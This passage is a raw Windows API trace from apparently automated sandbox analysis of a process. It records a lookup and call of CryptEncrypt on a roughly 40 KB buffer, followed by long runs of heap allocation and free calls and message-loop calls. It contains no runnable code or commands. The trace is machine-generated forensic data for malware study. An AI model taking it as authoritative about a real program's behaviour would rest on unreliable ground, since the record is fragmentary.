lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0212.178] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0212.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0212.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.178] CryptEncrypt (in: hKey=0xa872d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x9c99, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x9ca0) returned 1 [0212.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0212.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0212.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0212.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0212.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0212.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0212.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0212.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0212.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0212.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0212.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0212.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0212.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0212.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0212.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0212.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0212.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0212.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0212.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0212.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0212.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0212.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0212.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0212.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0212.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0212.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0212.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0212.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0212.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0212.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0212.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0212.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0212.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0212.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0212.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0212.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0212.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0212.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0212.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0212.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0212.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0212.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0212.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0212.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0212.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0212.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0212.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0212.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0212.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0212.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0212.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0212.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0212.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0212.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0212.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0212.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0212.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0212.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0212.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0212.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0212.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0212.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0212.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0212.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0212.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0212.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0212.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0212.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0212.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0212.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0212.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0212.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0212.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0212.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0212.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0212.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0212.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0212.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0212.183] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0212.183] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0212.183] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0212.184] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0212.184] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0212.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0212.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0212.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0212.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0212.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0212.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0212.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0212.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0212.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0212.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0212.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0212.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0212.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0212.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0212.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0212.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0212.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0212.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0212.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0212.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0212.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0212.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0212.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0212.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0212.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0212.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0212.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0212.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0212.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0212.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0212.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0212.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0212.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0212.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0212.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0212.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0212.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0212.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0212.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0212.186] CharLowerBuffW (in: lpsz="byte[40096]", cchLength=0xb | out: lpsz="byte[40096]") returned 0xb [0212.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0212.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0212.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0212.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0212.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0212.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0212.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0212.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0212.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0212.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0212.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0212.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0212.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0212.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0212.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9ca0) returned 0x2f41610 [0212.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0212.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0212.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0212.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0212.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0212.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0212.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0212.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0212.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0212.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0212.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0212.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0212.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0212.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0212.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0212.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0212.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0212.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0212.188] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0212.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0212.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0212.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0212.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0212.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0212.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0212.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0212.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0212.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0212.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0212.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0212.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0212.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0212.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9c99) returned 0x2e80330 [0212.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0212.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9c99) returned 0x2e89fd8 [0212.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0212.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0212.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0212.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0212.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0212.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0212.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0212.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0212.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0212.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e89fd8 | out: hHeap=0x970000) returned 1 [0212.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0212.205] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0212.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0212.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0212.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0212.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0212.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0212.206] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0212.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0212.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0212.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0212.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0212.206] 